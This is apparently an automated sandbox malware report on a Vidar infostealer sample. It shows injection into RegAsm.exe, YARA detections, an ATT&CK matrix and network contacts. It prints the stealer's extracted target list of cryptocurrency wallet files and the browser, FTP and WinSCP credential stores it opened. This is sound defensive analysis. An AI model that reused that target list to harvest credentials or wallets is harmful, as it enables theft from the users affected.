                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Source: RegAsm.exe, 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                  Opens network shares
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: \\config\Jump to behavior
                  Tries to harvest and steal Bitcoin Wallet information
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                  Source: Yara matchFile source: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Vidar
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Yara detected Vidar stealer
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.70aac0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.6e0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: file.exe PID: 6856, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5984, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0C40 sqlite3_bind_zeroblob,3_2_6C8B0C40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0D60 sqlite3_bind_parameter_name,3_2_6C8B0D60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D8EA0 sqlite3_clear_bindings,3_2_6C7D8EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C8B0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,3_2_6C8B0B40
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D6410 bind,WSAGetLastError,3_2_6C7D6410
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7D6070 PR_Listen,3_2_6C7D6070
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7DC050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,3_2_6C7DC050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7DC030 sqlite3_bind_parameter_count,3_2_6C7DC030

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Native API                  		Boot or Logon Initialization Scripts511
                  Process Injection                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  Account Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  Command and Scripting Interpreter                  		Logon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading                  		Security Account Manager4
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Screen Capture                  		3
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Masquerading                  		NTDS55
                  System Information Discovery                  		Distributed Component Object ModelInput Capture114
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Virtualization/Sandbox Evasion                  		LSA Secrets1
                  Network Share Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts511
                  Process Injection                  		Cached Domain Credentials141
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem12
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1442218 Sample: file.exe Startdate: 15/05/2024 Architecture: WINDOWS Score: 100 35 steamcommunity.com 2->35 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 Antivirus detection for URL or domain 2->45 47 8 other signatures 2->47 9 file.exe 1 2->9         started        signatures3 process4 signatures5 49 Contains functionality to inject code into remote processes 9->49 51 Writes to foreign memory regions 9->51 53 Allocates memory in foreign processes 9->53 55 Injects a PE file into a foreign processes 9->55 12 RegAsm.exe 1 45 9->12         started        17 RegAsm.exe 9->17         started        19 conhost.exe 9->19         started        process6 dnsIp7 37 steamcommunity.com 23.194.234.100, 443, 49730 AKAMAI-ASUS United States 12->37 39 95.217.240.101, 443, 49731, 49732 HETZNER-ASDE Germany 12->39 27 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 12->27 dropped 29 C:\Users\user\AppData\...\softokn3[1].dll, PE32 12->29 dropped 31 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 12->31 dropped 33 10 other files (none is malicious) 12->33 dropped 57 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->57 59 Found many strings related to Crypto-Wallets (likely being stolen) 12->59 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->61 65 5 other signatures 12->65 21 cmd.exe 1 12->21         started        63 Searches for specific processes (likely to inject) 17->63 file8 signatures9 process10 process11 23 conhost.exe 21->23         started        25 timeout.exe 1 21->25         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe100%AviraHEUR/AGEN.1317471
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\ProgramData\GHIJJEGDBFII\freebl3.dll0%ReversingLabs
                  C:\ProgramData\GHIJJEGDBFII\mozglue.dll0%ReversingLabs
                  C:\ProgramData\GHIJJEGDBFII\msvcp140.dll0%ReversingLabs
                  C:\ProgramData\GHIJJEGDBFII\nss3.dll0%ReversingLabs
                  C:\ProgramData\GHIJJEGDBFII\softokn3.dll0%ReversingLabs
                  C:\ProgramData\GHIJJEGDBFII\vcruntime140.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.0%URL Reputationsafe
                  https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=engli0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpE0%URL Reputationsafe
                  http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17rer.exe0%URL Reputationsafe
                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%URL Reputationsafe
                  https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
                  https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc940%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&0%URL Reputationsafe
                  https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&l=0%URL Reputationsafe
                  http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
                  https://mozilla.org0/0%URL Reputationsafe
